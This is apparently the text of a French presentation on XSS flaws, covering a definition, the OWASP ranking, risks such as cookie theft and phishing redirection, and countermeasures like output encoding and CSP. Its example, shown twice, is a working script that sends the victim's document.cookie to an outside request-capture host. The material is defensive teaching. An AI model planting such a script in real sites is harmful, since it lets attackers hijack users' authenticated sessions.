2. Plan
1. Qu’est ce qu’une faille XSS ?
1. Définition
2. Risques
3. Types de XSS
2. Contremesures
1. Input filtering/Output encoding
2. CSP
3. Outils de détection
3. Qu’est ce qu’une faille XSS ?
Définition
Exécution de code client malicieux depuis un site web légitime par le navigateur web de la victime
4. Qu’est ce qu’une faille XSS ?
OWASP
Classée numéro 3 du TOP 10
Prévalence Très répandue
Détection Facile
Impact Modérée
5. Qu’est ce qu’une faille XSS ?
Risques
Vol de cookie d’authentification
Porte d’entrée pour les injections CSRF
Redirection des utilisateurs vers un site de phishing
Attaque sur le système (exemple : scan)
6. Qu’est ce qu’une faille XSS ?
Exemple
Site avec listing des avis client
Objectif : Voler les cookies d’authentification des utilisateurs pour s’authentifier à leur place
Script :
Prévalence :
Se produit quand l’application web inclue dans une page des données saisies par un utilisateur (commentaire, article de blog, Twitter, etc.)
Détection :
Outils automatiques de détection
Impact :
Exécution de scripts sur le navigateur de la victime
Deface de site web
Redirection (Phishing)
<script>
var req = new XMLHttpRequest();
req.open('GET', 'http://requestb.in/1b34t841?' + document.cookie, true);
req.send(null);
</script>
<script>
var req = new XMLHttpRequest();
req.open('GET', 'http://requestb.in/1b34t841?' + document.cookie, true);
req.send(null);
</script>